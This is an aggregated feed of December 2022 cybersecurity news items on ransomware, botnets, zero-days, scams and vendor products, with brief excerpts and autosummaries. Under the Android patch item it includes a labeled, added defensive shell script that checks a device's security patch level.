                The US Department of Health and Human Services (HHS) warns healthcare organizations of Royal ransomware attacks. The human-operated Royal ransomware first appeared on the threat landscape in September 2022 and has demanded ransoms of up to millions of dollars. The Health and Human Services (HHS) is aware of attacks against the Healthcare and Public Healthcare (HPH) […]

                The post US HHS warns healthcare orgs of Royal Ransomware attacks appeared first on Security Affairs.

                Autosummary: HC3 added that threat actors continue to use multiple attack vectors associated with this ransomware, including phishing, Remote Desktop Protocol (RDP) compromises and credential abuse, compromises of exploited vulnerabilities, such as VPN servers, and compromises in other known vulnerabilities, HHS notes.


                Hackers earn $989,750 for 63 zero-days exploited at Pwn2Own Toronto

                exploits
                2022-12-10 https://www.bleepingcomputer.com/news/security/hackers-earn-989-750-for-63-zero-days-exploited-at-pwn2own-toronto/
                Pwn2Own Toronto 2022 has ended with competitors earning $989,750 for 63 zero-day exploits (and multiple bug collisions) targeting consumer products between December 6th and December 9th. [...]


                OPSWAT MetaDefender Cloud Email Security protects users against zero-day threats

                exploits
                2022-12-09 https://www.helpnetsecurity.com/2022/12/09/opswat-metadefender-cloud-email-security/

                OPSWAT announced that its MetaDefender Email Gateway Security solution is now available from the cloud as a service, known as MetaDefender Cloud Email Security. This new offering gives organizations the same advanced email security controls but with the added benefits of reduced costs, scalability, ease of operation and improved efficiency. Cloud email adoption is steadily increasing, with research indicating that a majority of organizations are migrating to cloud-based email solutions instead of on-premises to proactively … More

                The post OPSWAT MetaDefender Cloud Email Security protects users against zero-day threats appeared first on Help Net Security.


                HackNotice 4.0 allows companies to craft custom phishing templates

                financial
                2022-12-09 https://www.helpnetsecurity.com/2022/12/09/hacknotice-4-0/

                HackNotice unveils new platform features, a new logo and wordmark, dark mode, personalized dashboards, risk meters, easier-to-understand alerts, more powerful monitoring, continuous phishing with the press of a button, and new, easy-to-create templates for phishing. The new platform also allows employees to be grouped based on departments and/or security habits. HackNotice 4.0 allows companies to craft custom phishing templates to help employees identify potential phishing attacks. The templates can be personalized for each employee, making … More

                The post HackNotice 4.0 allows companies to craft custom phishing templates appeared first on Help Net Security.


                Rezilion updates its vulnerability risk determination tool MI-X

                exploits
                2022-12-09 https://www.helpnetsecurity.com/2022/12/09/rezilion-mi-x/

                Rezilion has updated MI-X, its open-source tool developed by Rezilion’s vulnerability research team. Available as a download from the GitHub repository, MI-X already has more than 100 stars on GitHub since its debut in August 2022. The CLI tool is a free, open-source companion to Rezilion’s enterprise solution for software supply chain security and helps researchers and developers identify whether containers and hosts are impacted by a specific vulnerability, thus allowing organizations to target remediation … More

                The post Rezilion updates its vulnerability risk determination tool MI-X appeared first on Help Net Security.


                MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics

                industry
                2022-12-09 https://thehackernews.com/2022/12/muddywater-hackers-target-asian-and.html
                The Iran-linked MuddyWater threat actor has been observed targeting several countries in the Middle East as well as Central and West Asia as part of a new spear-phishing activity. "The campaign has been observed targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates," Deep Instinct researcher Simon Kenin said in a technical write-up.


                Researchers Uncover New Drokbk Malware that Uses GitHub as a Dead Drop Resolver

                exploits
                2022-12-09 https://thehackernews.com/2022/12/researchers-uncover-new-drokbk-malware.html
                The subgroup of an Iranian nation-state group known as Nemesis Kitten has been attributed as behind a previously undocumented custom malware dubbed Drokbk that uses GitHub as a dead drop resolver to exfiltrate data from an infected computer, or to receive commands. "The use of GitHub as a virtual dead drop helps the malware blend in," Secureworks principal researcher Rafe Pilling said. "All the

                Autosummary: Subsequent investigations into the adversary's operations have uncovered two distinct intrusion sets: Cluster A, which employs BitLocker and DiskCryptor to conduct opportunistic ransomware attacks for financial gain, and Cluster B, which carries out targeted break-ins for intelligence gathering.


                Holiday 2022 deal: 20% off Zero2Automated malware analysis training

                exploits
                2022-12-09 https://www.bleepingcomputer.com/news/security/holiday-2022-deal-20-percent-off-zero2automated-malware-analysis-training/
                Zero2Automated, the creators of the popular malware analysis and reverse-engineering course, is having a Christmas special where you can get 20% off all courses on their site, with additional goodies thrown in. [...]

                Autosummary: Run malware analysis sandbox 3-month license with the following features: Win 7 32/64bit; unlimited manual submissions (1 parallel); interactive access; analysis time: 660 sec; max input file size: 100MB; HTML reports; URL analysis; MITRE ATT&CK mapping; process behavior graph; extended IDS rule sets; video record; MITM proxy for HTTPS; locale selection; network geolocation; priority in queue; various software presets; custom OpenVPN configuration; monitoring of system processes. Zero2Automated has also opened pre-registration for their remastered beginner malware analysis course for those looking to learn how to reverse engineer but wanting something a little more beginner-friendly.


                Rackspace customers rage following ransomware attack, as class-action lawsuits filed

                exploits ransomware
                2022-12-09 https://www.bitdefender.com/blog/hotforsecurity/rackspace-customers-rage-following-ransomware-attack-as-class-action-lawsuits-filed/
                As ever, what matters most is not so much whether an organisation gets hit or not by a ransomware attack, but how well it handles the aftermath and recovery. Read more in my article on the Hot for Security blog.

                Autosummary: By 5 December, Rackspace said it had engaged third-party experts to look into the ransomware attack, and declined to confirm whether it had paid, or might be prepared to pay, the ransom to its extortionists.


                New Truebot Malware Variant Leveraging Netwrix Auditor Bug and Raspberry Robin Worm

                exploits
                2022-12-09 https://thehackernews.com/2022/12/new-truebot-malware-variant-leveraging.html
                Cybersecurity researchers have reported an increase in TrueBot infections, primarily targeting Mexico, Brazil, Pakistan, and the U.S. Cisco Talos said the attackers behind the operation have moved from using malicious emails to alternative delivery methods such as the exploitation of a now-patched remote code execution (RCE) flaw in Netwrix Auditor as well as the Raspberry Robin worm.

                Autosummary: The attackers, however, appear to have switched to an unknown TrueBot distribution mechanism starting in November, with the vector succeeding in co-opting over 500 internet-facing Windows servers located in the U.S., Canada, and Brazil into a botnet.


                What Stricter Data Privacy Laws Mean for Your Cybersecurity Policies

                ciber
                2022-12-09 https://thehackernews.com/2022/12/what-stricter-data-privacy-laws-mean.html
                For today's businesses data privacy is already a big headache, and with modern privacy laws expanding to more of the world's population, regulatory compliance is on track to become a more complicated, high-stakes process touching on every aspect of an organization. In fact, Gartner predicts that by 2024, 75% of the global population will have its personal data covered under privacy regulations.

                Autosummary: This legislation includes: Virginia Consumer Data Protection Act (VCDPA), effective January 1st, 2023; California Privacy Rights Act (CPRA), effective January 1st, 2023; Utah Consumer Privacy Act (UCPA), effective December 31st, 2023; Connecticut Data Privacy Act (CDPA), effective July 1st, 2023; Colorado Privacy Act (CPA), effective July 1st, 2023. Australia has already begun tightening its data privacy and cybersecurity laws. Indeed, organizations can stay compliant with the ever-changing privacy regulations and reduce the risk of reputational damage by implementing up-to-date policy protocols, identifying employee training best practices, and instilling a nimble framework for company-wide password changes.


                Xenomorph: What to know about this Android banking trojan

                financial exploits
                2022-12-09 https://www.welivesecurity.com/videos/xenomorph-what-know-android-banking-trojan/

                Xenomorph pilfers victims' login credentials for banking, payment, social media, cryptocurrency and other apps with valuable data

                The post Xenomorph: What to know about this Android banking trojan appeared first on WeLiveSecurity


                Rackspace warns of phishing risks following ransomware attack

                financial exploits ransomware
                2022-12-09 https://www.bleepingcomputer.com/news/security/rackspace-warns-of-phishing-risks-following-ransomware-attack/
                Cloud computing provider Rackspace warned customers on Thursday of increased risks of phishing attacks following a ransomware attack affecting its hosted Microsoft Exchange environment. [...]

                Autosummary: Rackspace added that customers could easily spot scammers attempting to steal their sensitive information since: emails from Rackspace will be sent from @rackspace.com addresses (although attackers might still use a spoofed email address and redirect their targets to a phishing landing page); Rackspace support will not ask for login credentials or personal information (e.g., social security number, driver's license) during phone calls. Even though the company is yet to reveal if it has any evidence that the attackers have stolen data from its systems during the breach, customers were advised to remain vigilant and monitor their credit reports and bank account statements for suspicious activity.


                Using XDR to Consolidate and Optimize Cybersecurity Technology

                ciber
                2022-12-09 https://thehackernews.com/2022/12/using-xdr-to-consolidate-and-optimize.html
                Businesses know they need cybersecurity, but it seems like a new acronym and system is popping up every day. Professionals that aren’t actively researching these technologies can struggle to keep up. As the cybersecurity landscape becomes more complicated, organizations are desperate to simplify it. Frustrated with the inefficiencies that come with using multiple vendors for cybersecurity, often

                Autosummary: However, many XDR platforms, including Cynet 360 AutoXDR, provide automation as a standard offering, meaning it won't cost the business any extra. Additionally, learning a new system could contribute to analyst burnout, so organizations concerned with retention may be hesitant to implement something new, even if it could reduce burnout over time. Additionally, Cynet 360 AutoXDR includes a managed detection and response (MDR) service for no extra charge, helping businesses fill in security gaps without hiring extra analysts — something that is both expensive and extremely difficult at a time when there are around 770,000 unfilled cybersecurity job openings in the United States alone. Frustrated with the inefficiencies that come with using multiple vendors for cybersecurity, often stemming from a lack of integration of a heterogeneous security stack, approximately 75% of organizations are looking to consolidate their cybersecurity technology in 2022 — a 29% increase from 2020.


                CommonSpirit confirms data breach impacts 623K patients

                financial
                2022-12-09 https://securityaffairs.co/wordpress/139472/data-breach/commonspirit-data-breach-623k-patients.html

                CommonSpirit Health confirmed that the October security breach resulted in the exposure of the personal data of 623,774 patients. In early October, CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that caused severe inconvenience to the facilities and to patients. The security breach led to delayed surgeries, hold-ups […]

                The post CommonSpirit confirms data breach impacts 623K patients appeared first on Security Affairs.


                Diamond industry under attack – Week in security with Tony Anscombe

                industry
                2022-12-09 https://www.welivesecurity.com/videos/diamond-industry-attack-week-security-tony-anscombe/

                ESET researchers uncover a new wiper and its execution tool, both attributed to the Iran-aligned Agrius APT group

                The post Diamond industry under attack – Week in security with Tony Anscombe appeared first on WeLiveSecurity


                OpenText collaborates with Allstate Identity Protection to protect consumers from cyber threats

                government
                2022-12-08 https://www.helpnetsecurity.com/2022/12/08/opentext-allstate-identity-protection/

                OpenText has partnered with Allstate Identity Protection (AIP) to offer identity protection services to Webroot customers to further protect consumers from evolving cyber threats by shielding their devices, identities and private information. Webroot protects computers, laptops, tablets, smartphones and other digital devices from threats like malware, ransomware, phishing and more. AIP safeguards personal information and the data people share online. The combined offering provides consumers with exceptional multi-layer protection for their digital life. “Increased online … More

                The post OpenText collaborates with Allstate Identity Protection to protect consumers from cyber threats appeared first on Help Net Security.

                Autosummary: Additional benefits include: device protection: real-time anti-phishing, malware, and ransomware protection against emerging threats; lightning-fast scans without interruption; proactive alerts with firewall and network connection monitoring; protection of account logins and passwords; device cleaning and performance improvements. Identity protection: dark web monitoring; credit monitoring (one bureau).


                How IoT is changing the threat landscape for businesses

                industry
                2022-12-08 https://www.helpnetsecurity.com/2022/12/08/iot-threat-landscape-businesses-video/

                Where IoT-enabled devices connect to wider networks, their potential functionalities are immense, with countless applications across various industries, including production and manufacturing, healthcare, finance, and energy. In this Help Net Security video, Paul Keely, Chief Cloud Officer at Open Systems, talks about how organizations that employ IoT technology have improved their business efficiency. Still, all this data introduces a new challenge – security. While IoT presents organizations with new ways to advance and optimize, the … More

                The post How IoT is changing the threat landscape for businesses appeared first on Help Net Security.


                Secret Double Octopus unveils phishing-resistant passwordless MFA capabilities

                financial
                2022-12-08 https://www.helpnetsecurity.com/2022/12/08/secret-double-octopus-mfa/

                Secret Double Octopus (SDO) has unveiled the new phishing-resistant passwordless MFA capabilities for customers with password-centric directory infrastructure. Organizations using SDO’s Octopus Platform can achieve Presidential Executive Order M-22-09’s phishing-resistant MFA mandates and meet stringent cyber insurance criteria with new capabilities available to adopters of the company’s Octopus Authentication Platform. The release comes as attackers have expanded phishing attacks against enterprises, leveraging man-in-the-middle (MiTM) tooling and push fatigue strategies to bypass traditional MFA. Despite this, … More

                The post Secret Double Octopus unveils phishing-resistant passwordless MFA capabilities appeared first on Help Net Security.


                NowSecure Mobile PTaaS offers continuous automated compliance testing

                ransomware
                2022-12-08 https://www.helpnetsecurity.com/2022/12/08/nowsecure-mobile-ptaas/

                NowSecure has launched its latest offering, NowSecure Mobile Pen Testing as a Service (PTaaS), to bridge the gap between automated and manual mobile security assessments for continuous security. Designed to provide mobile developers and security teams with a more cost-effective, efficient pen testing solution, NowSecure PTaaS combines periodic expert manual assessments with automated continuous testing to optimize for full coverage at a higher frequency rate. With this combination, the all-in-one portal and service can identify … More

                The post NowSecure Mobile PTaaS offers continuous automated compliance testing appeared first on Help Net Security.

                Autosummary: Built on over 12 years of mobile application security experience and tens of thousands of pen tests performed, the NowSecure Mobile PTaaS cloud-based platform offers a depth of automated continuous and manual assessments, including: periodic expert pen testing based on specific need and schedule; on-demand and continuous security testing integrated into the CI/CD and dev toolchain; automatic generation of tickets that include embedded remediation resources; remediation consulting with an expert pen tester; optional industry standard(s) validations and certifications; all-in-one SAST, DAST, IAST, APISec, and SBOM; and an easy-to-use, dedicated SaaS platform. “Mobile apps are critically important to business because they generate revenue and connect with customers.


                Cybercriminals are scamming each other, tipping off law enforcement

                financial ciber
                2022-12-08 https://www.helpnetsecurity.com/2022/12/08/cybercriminals-scamming-each-other/

                Cybercriminals are scamming each other out of millions of dollars and use arbitration to settle disputes about the scams, according to Sophos. For this report, Sophos experts investigated two Russian-language cybercrime forums that provide Access-as-a-Service (AaaS) listings, and an English-language cybercrime forum and marketplace specializing in data leaks. All three sites have dedicated arbitration rooms. Despite this resolution process provoking occasional mayhem among the “plaintiffs and defendants,” with some accused criminals either going dark and … More



                Google Warns of Internet Explorer Zero-Day Vulnerability Exploited by ScarCruft Hackers

                exploits
                2022-12-08 https://thehackernews.com/2022/12/google-warns-of-internet-explorer-zero.html
                An Internet Explorer zero-day vulnerability was actively exploited by a North Korean threat actor to target South Korean users by capitalizing on the recent Itaewon Halloween crowd crush to trick users into downloading malware. The discovery, reported by Google Threat Analysis Group researchers Benoît Sevens and Clément Lecigne, is the latest set of attacks perpetrated by ScarCruft, which is


                Iranian Hackers Strike Diamond Industry with Data-Wiping Malware in Supply-Chain Attack

                exploits industry
                2022-12-08 https://thehackernews.com/2022/12/iranian-hackers-strike-diamond-industry.html
                An Iranian advanced persistent threat (APT) actor known as Agrius has been attributed as behind a set of data wiper attacks aimed at diamond industries in South Africa, Israel, and Hong Kong. The wiper, codenamed Fantasy by ESET, is believed to have been delivered via a supply chain attack targeting an Israeli software suite developer as part of a campaign that began in February 2022. Victims

                Autosummary: Agrius, the Iran-aligned group behind the intrusions, has been active since at least December 2020 and leverages known security flaws in internet-facing applications to drop web shells that are, in turn, used to facilitate reconnaissance, lateral movement, and the delivery of final-stage payloads.


                New "Zombinder" platform binds Android malware with legitimate apps

                exploits
                2022-12-08 https://www.bleepingcomputer.com/news/security/new-zombinder-platform-binds-android-malware-with-legitimate-apps/
                A darknet platform dubbed "Zombinder" allows threat actors to bind malware to legitimate Android apps, causing victims to infect themselves while still having the full functionality of the original app to evade suspicion. [...]

                Autosummary: Zombinder service promotional post (ThreatFabric) The campaign drops an Ermac payload for Android, capable of performing keylogging, overlay attacks, stealing emails from Gmail, intercepting 2FA codes, and stealing crypto wallet seed phrases.


                Best Year-End Cybersecurity Deals from Uptycs, SANS Institute, and Bitdefender

                ciber
                2022-12-08 https://thehackernews.com/2022/12/best-year-end-cybersecurity-deals-from.html
                Looking to up your cybersecurity game in the new year? Do not just buy electronics this vacation season, improve your cybersecurity! The end of the year is a great time to re-evaluate your cybersecurity strategy and make some important investments in protecting your personal and professional data. Cyber threats are constantly evolving and becoming more sophisticated, so it's important to stay on

                Autosummary: With this offer, you get access to Uptycs' powerful security tools and features, including real-time visibility and control over your infrastructure, customizable queries and dashboards for tailored threat detection, and a scalable architecture for large and complex environments. This package includes advanced features like antivirus, anti-ransomware, web protection, and more.


                Rackspace confirms it suffered a ransomware attack

                exploits ransomware
                2022-12-08 https://www.malwarebytes.com/blog/news/2022/12/rackspace-confirms-it-suffered-a-ransomware-attack

                Categories: News, Ransomware
                Tags: Rackspace, Exchange, ransomware, ProxyNotShell

                Rackspace said a ransomware incident affected its Hosted Exchange environment and caused service disruptions.

                Autosummary: Workaround: Rackspace said it will help affected customers implement a temporary forwarding while the disruption is ongoing: “As a temporary solution while you set up Microsoft 365, it is possible to also implement a forwarding option that will allow mail destined for a Hosted Exchange user to be routed to an external email address.


                Metaparasites: The cybercriminals who rip each other off

                ciber
                2022-12-08 https://grahamcluley.com/metaparasites-the-cybercriminals-who-rip-each-other-off/
                Researchers at Sophos have investigated so-called "metaparasites" - the scammers who scam other scammers.

                Autosummary: According to the researchers, yes there is: “Metaparasites, inadvertently, provide an intelligence boon to analysts, allowing us to gain unprecedented insights into sales, operations, negotiations, and identifiers which would otherwise remain hidden – as well as into marketplace culture, differing levels of operational security, and susceptibilities to deception and social engineering.”


                North Korean hackers exploit Seoul Halloween tragedy in zero-day attack

                exploits
                2022-12-08 https://www.tripwire.com/state-of-security/malicious-hackers-exploit-seoul-halloween-tragedy-zero-day-attack
                Malicious hackers, hell-bent on infiltrating an organisation, have no qualms about exploiting even the most tragic events. Read more in my article on the Tripwire State of Security blog.

                Autosummary: According to TAG, a zero-day vulnerability was embedded in the malicious documents by the APT37 hacking group (also known as ScarCruft, InkySquid, Reaper, and Ricochet Chollima).


                APT37 used Internet Explorer Zero-Day in a recent campaign

                exploits
                2022-12-08 https://securityaffairs.co/wordpress/139403/apt/apt37-internet-explorer-zero-day.html

                Google warns that the North Korea-linked APT37 group is exploiting an Internet Explorer zero-day flaw to spread malware. The North Korea-linked APT37 group (aka ScarCruft, Reaper, and Group123) actively exploited an Internet Explorer zero-day vulnerability, tracked as CVE-2022-41128, in attacks aimed at South Korean users. Google Threat Analysis Group researchers discovered the zero-day vulnerability in late October 2022, it […]


                CommonSpirit Health ransomware attack exposed data of 623,000 patients

                exploits ransomware
                2022-12-08 https://www.bleepingcomputer.com/news/security/commonspirit-health-ransomware-attack-exposed-data-of-623-000-patients/
                CommonSpirit Health has confirmed that threat actors accessed the personal data for 623,774 patients during an October ransomware attack. [...]


                Cisco discloses high-severity IP phone bug with exploit code

                exploits
                2022-12-08 https://www.bleepingcomputer.com/news/security/cisco-discloses-high-severity-ip-phone-bug-with-exploit-code/
                Cisco has disclosed today a high-severity vulnerability affecting the latest generation of its IP phones and exposing unpatched devices to remote code execution and denial of service (DoS) attacks. [...]


                Zombinder APK binding service used in multiple malware attacks

                exploits
                2022-12-08 https://securityaffairs.co/wordpress/139431/malware/zombinder-apk-binding-service.html

                Zombinder is a third-party service on the darknet used to embed malicious payloads in legitimate Android applications. While investigating a new malware campaign targeting Android and Windows systems, researchers at ThreatFabric discovered a darknet service, dubbed Zombinder, used to embed malicious payloads in legitimate Android apps. The campaign involved the Ermac Android banking Trojan along […]

                Autosummary: The Ermac variant employed in the attack has the following capabilities:
                    Overlay attack to steal PII
                    Keylogging
                    Stealing e-mails from the Gmail application
                    Stealing 2FA codes
                    Stealing seed phrases from several cryptocurrency wallets
                Experts also observed threat actors disguising malicious apps as browser updates.


                US Health Dept warns of Royal Ransomware targeting healthcare

                exploits ransomware
                2022-12-08 https://www.bleepingcomputer.com/news/security/us-health-dept-warns-of-royal-ransomware-targeting-healthcare/
                The U.S. Department of Health and Human Services (HHS) issued a new warning today for the country's healthcare organizations regarding ongoing attacks from a relatively new operation, the Royal ransomware gang. [...]

                Autosummary: Royal ransomware submissions (ID Ransomware) Healthcare under attack: The federal government has also warned about other ransomware operations known for actively targeting healthcare organizations across the U.S. For instance, last month, HHS warned of Venus ransomware impacting the country's healthcare, with at least one entity known to have fallen victim to its attacks.


                Researchers Uncover Darknet Service Allowing Hackers to Trojanize Legit Android Apps

                exploits
                2022-12-08 https://thehackernews.com/2022/12/researchers-uncover-darknet-service.html
                Researchers have shed light on a new hybrid malware campaign targeting both Android and Windows operating systems in a bid to expand its pool of victims. The attacks entail the use of different malware such as ERMAC, Erbium, Aurora, and Laplas, according to a ThreatFabric report shared with The Hacker News. "This campaign resulted in thousands of victims," the Dutch cybersecurity company said,


                Cisco discloses high-severity IP phone zero-day with exploit code

                exploits
                2022-12-08 https://www.bleepingcomputer.com/news/security/cisco-discloses-high-severity-ip-phone-zero-day-with-exploit-code/
                Cisco has disclosed today a high-severity zero-day vulnerability affecting the latest generation of its IP phones and exposing them to remote code execution and denial of service (DoS) attacks. [...]


                Fear of cyberattacks drives SMBs to spend more on software

                ciber
                2022-12-07 https://www.helpnetsecurity.com/2022/12/07/smbs-software-spending-2023/

                Despite fears of a looming recession, SMBs in the U.S. are spending more on software in 2023, according to Capterra’s 2023 SMB Software Buying Trends Survey. 75% of U.S. SMBs estimate they’ll spend more on software in 2023 compared to 2022. Alongside increased software budgets, Capterra’s survey of over 500 SMBs reveals four other major trends in software buying behaviors and challenges that will impact businesses in 2023: Fearful of cyberattacks, U.S. businesses rate security … More



                Palo Alto Networks Medical IoT Security protects connected medical devices

                industry
                2022-12-07 https://www.helpnetsecurity.com/2022/12/07/palo-alto-networks-medical-iot-security/

                Palo Alto Networks has released Medical IoT Security — the zero trust security solution for medical devices — enabling healthcare organizations to deploy and manage new connected technologies. Zero trust is a strategic approach to cybersecurity that secures an organization by eliminating implicit trust by continuously verifying every user and device. “The proliferation of connected medical devices in the healthcare industry brings a wealth of benefits, but these devices are often not well secured. For … More

                Autosummary: Easily understand medical device vulnerabilities, patch status and security settings, and then get recommendations to bring devices into compliance with rules and guidelines, such as the Health Insurance Portability and Accountability Act (HIPAA), General Data Protection Regulation (GDPR), and similar laws and regulations. “For example, according to Unit 42, an alarming 75% of smart infusion pumps examined on the networks of hospitals and healthcare organizations had known security gaps,” said Anand Oswal, senior vice president of products, network security at Palo Alto Networks.


                New Go-based Zerobot Botnet Exploiting Dozen of IoT Vulnerabilities to Expand its Network

                exploits industry
                2022-12-07 https://thehackernews.com/2022/12/new-go-based-zerobot-botnet-exploiting.html
                A novel Go-based botnet called Zerobot has been observed in the wild proliferating by taking advantage of nearly two dozen security vulnerabilities in internet of things (IoT) devices and other software. The botnet "contains several modules, including self-replication, attacks for different protocols, and self-propagation," Fortinet FortiGuard Labs researcher Cara Lin said. "It also


                Elon Musk's Twitter followers targeted in fake crypto giveaway scam

                financial
                2022-12-07 https://www.bleepingcomputer.com/news/security/elon-musks-twitter-followers-targeted-in-fake-crypto-giveaway-scam/
                Twitter accounts giving Elon Musk a follow are being targeted in a crypto giveaway scam dubbed "Freedom Giveaway." [...]

                Autosummary: On mobile, this is how the "Deal of the Year" list looks: Twitter "Deal of the Year" list is a scam (BleepingComputer) As of today, the list has 155 members added by its admin (the threat actor), and these accounts, when reviewed by BleepingComputer, were seen following Elon Musk, Tesla, SpaceX and related organizations on Twitter.


                Top 7 factors boosting enterprise cybersecurity resilience

                ciber
                2022-12-07 https://www.helpnetsecurity.com/2022/12/07/factors-cybersecurity-resilience/

                Cybersecurity resilience is a top priority for companies as they look to defend against a rapidly evolving threat landscape, according to the latest edition of Cisco’s annual Security Outcomes Report. The survey findings are based on survey responses from over 4,700 participants across 26 countries, and pinpoint the top seven success factors that boost enterprise cybersecurity resilience, with a particular focus on cultural, environmental, and solution-based factors that businesses leverage to achieve security. The survey … More

                Autosummary: The leading impacts cited include IT and communications interruption (62.6 percent), supply chain disruption (43 percent), impaired internal operations (41.4 percent) and lasting brand damage (39.7 percent).


                Microsoft Alerts Cryptocurrency Industry of Targeted Cyberattacks

                industry ciber
                2022-12-07 https://thehackernews.com/2022/12/microsoft-alerts-cryptocurrency.html
                Cryptocurrency investment companies are the target of a developing threat cluster that uses Telegram groups to seek out potential victims. Microsoft's Security Threat Intelligence Center (MSTIC) is tracking the activity under the name DEV-0139, and builds upon a recent report from Volexity that attributed the same set of attacks to North Korea's Lazarus Group. "DEV-0139 joined Telegram groups

                Autosummary: In recent years, Telegram has not only witnessed widespread adoption in the cryptocurrency industry, but also been co-opted by threat actors looking to discuss zero-day vulnerabilities, offer stolen data, and market their services through the popular messaging platform.


                Vice Society Ransomware Attackers Targeted Dozens of Schools in 2022

                exploits ransomware
                2022-12-07 https://thehackernews.com/2022/12/vice-society-ransomware-attackers.html
                The Vice Society cybercrime group has disproportionately targeted educational institutions, accounting for 33 victims in 2022 and surpassing other ransomware families like LockBit, BlackCat, BianLian, and Hive. Other prominent industry verticals targeted include healthcare, governments, manufacturing, retail, and legal services, according to an analysis of leak site data by Palo Alto Networks


                New Go-based botnet Zerobot exploits dozens of flaws

                exploits
                2022-12-07 https://securityaffairs.co/wordpress/139392/malware/zerobot-botnet-dozens-flaws.html

                Researchers discovered a new Go-based botnet called Zerobot that exploits two dozen security vulnerabilities in IoT devices. Fortinet FortiGuard Labs researchers have discovered a new Go-based botnet called Zerobot that spreads by exploiting two dozen security vulnerabilities in internet of things (IoT) devices and other applications. “This botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, […]

                Autosummary: Zerobot targets multiple architectures, including i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64, and s390x.


                New Zerobot malware has 21 exploits for BIG-IP, Zyxel, D-Link devices

                exploits
                2022-12-07 https://www.bleepingcomputer.com/news/security/new-zerobot-malware-has-21-exploits-for-big-ip-zyxel-d-link-devices/
                A new Go-based malware named "Zerobot" has been spotted in mid-November using exploits for almost two dozen vulnerabilities in a variety of devices that include F5 BIG-IP, Zyxel firewalls, Totolink and D-Link routers, and Hikvision cameras. [...]

                Autosummary: The C2 may respond with one of the following commands:
                    ping – Heartbeat, maintaining the connection
                    attack – Launch attack for different protocols: TCP, UDP, TLS, HTTP, ICMP
                    stop – Stop attack
                    update – Install update and restart Zerobot
                    enable_scan – Scan for open ports and start spreading itself via exploit or SSH/Telnet cracker
                    disable_scan – Disable scanning
                    command – Run OS command, cmd on Windows and bash on Linux
                    kill – Kill botnet program
                The malware also uses an "anti-kill" module designed to prevent terminating or killing its process.


                CloudSEK claims it was hacked by another cybersecurity firm

                ciber
                2022-12-07 https://www.bleepingcomputer.com/news/security/cloudsek-claims-it-was-hacked-by-another-cybersecurity-firm/
                Indian cybersecurity firm CloudSEK says a threat actor gained access to its Confluence server using stolen credentials for one of its employees' Jira accounts. [...]

                Autosummary: Threat actor claims to have access to CloudSEK's network: A threat actor named "sedut" is now trying to sell what they claim is access to CloudSEK's "networks, Xvigil, codebase, email, JIRA and social media accounts" on multiple hacking forums.


                Google: State hackers still exploiting Internet Explorer zero-days

                exploits government
                2022-12-07 https://www.bleepingcomputer.com/news/security/google-state-hackers-still-exploiting-internet-explorer-zero-days/
                Google's Threat Analysis Group (TAG) revealed today that a group of North Korean hackers tracked as APT37 exploited a previously unknown Internet Explorer vulnerability (known as a zero-day) to infect South Korean targets with malware. [...]


                Elon Musk "Freedom Giveaway" crypto scam promoted via Twitter lists

                financial
                2022-12-07 https://www.bleepingcomputer.com/news/security/elon-musk-freedom-giveaway-crypto-scam-promoted-via-twitter-lists/
                Twitter accounts giving Elon Musk a follow are being targeted in a crypto giveaway scam dubbed "Freedom Giveaway." [...]

                Autosummary: On mobile, this is how the "Deal of the Year" list looks: Twitter "Deal of the Year" list is a scam (BleepingComputer) As of today, the list has 155 members added by its admin (the threat actor), and these accounts, when reviewed by BleepingComputer, were seen following Elon Musk, Tesla, SpaceX and related organizations on Twitter.


                Update now! Google patches Android vulnerability that allows remote code execution over Bluetooth

                exploits
                2022-12-07 https://www.malwarebytes.com/blog/news/2022/12/update-now-google-patches-android-vulnerability-that-allows-remote-code-execution-over-bluetooth

                Categories: Android, Exploits and vulnerabilities, News

                Google has issued its December round of patches, which includes a fix for a critical vulnerability that allows RCE over Bluetooth.

                Autosummary: In the Android security bulletin of December 5, 2022 you can find an overview of the security vulnerabilities affecting Android devices that are fixed in patch level 2022-12-05 or later.
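                The practical question for a fleet of devices is whether each one already reports that patch level. The script below is an added example, not code from the Malwarebytes post or from Google: it reads the patch level a device reports (on a real device the value comes from the real system property `ro.build.version.security_patch`, via `adb shell getprop ro.build.version.security_patch`), validates the YYYY-MM-DD format, and compares it against 2022-12-05. An empty or malformed value is reported as unknown rather than as patched. The sample values it loops over are constructed so it runs offline.

```shell
#!/bin/sh
# Added example, not code from the Malwarebytes post or from Google: checks
# whether an Android device's reported security patch level is at or past
# 2022-12-05, the patch level the December 2022 bulletin covers.
# On a real device the value comes from:
#   adb shell getprop ro.build.version.security_patch
# The sample values at the bottom are constructed so the script runs offline.

REQUIRED_PATCH="2022-12-05"

# patch_level_ok LEVEL [REQUIRED]
# Exit status 0: LEVEL is on or after REQUIRED.
#             1: LEVEL is older than REQUIRED (device still exposed).
#             2: LEVEL is empty or not a YYYY-MM-DD string (treat as unknown,
#                never as patched).
patch_level_ok() {
    level="$1"
    required="${2:-$REQUIRED_PATCH}"
    case "$level" in
        [0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]) ;;
        *) return 2 ;;
    esac
    # Strip the dashes so both dates compare as plain integers (YYYYMMDD).
    lvl=$(printf '%s' "$level" | tr -d '-')
    req=$(printf '%s' "$required" | tr -d '-')
    if [ "$lvl" -lt "$req" ]; then
        return 1
    fi
    return 0
}

# check_device LEVEL: prints a one-line verdict and returns patch_level_ok's status.
check_device() {
    rc=0
    patch_level_ok "$1" || rc=$?
    case $rc in
        0) printf '%s: patched (at or after %s)\n' "$1" "$REQUIRED_PATCH" ;;
        1) printf '%s: NOT patched, install the 2022-12-05 or later update\n' "$1" ;;
        *) printf '%s: unreadable patch level, verify manually\n' "${1:-<empty>}" ;;
    esac
    return $rc
}

# Constructed sample values standing in for getprop output on several devices.
for sample in "2022-11-01" "2022-12-05" "2023-01-05" ""; do
    check_device "$sample" || true
done
```

                To run it against real hardware, replace the sample loop with `check_device "$(adb shell getprop ro.build.version.security_patch | tr -d '\r')"` for each connected device. Note that the property only states the patch level the vendor build claims to include; it does not prove that a particular CVE fix is present, so it is a triage signal, not a substitute for installing the vendor update.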


                Ho, ho, no! Scams to avoid this festive season

                financial
                2022-12-07 https://www.malwarebytes.com/blog/news/2022/12/ho-ho-no-scams-to-avoid-this-festive-season

                Categories: News
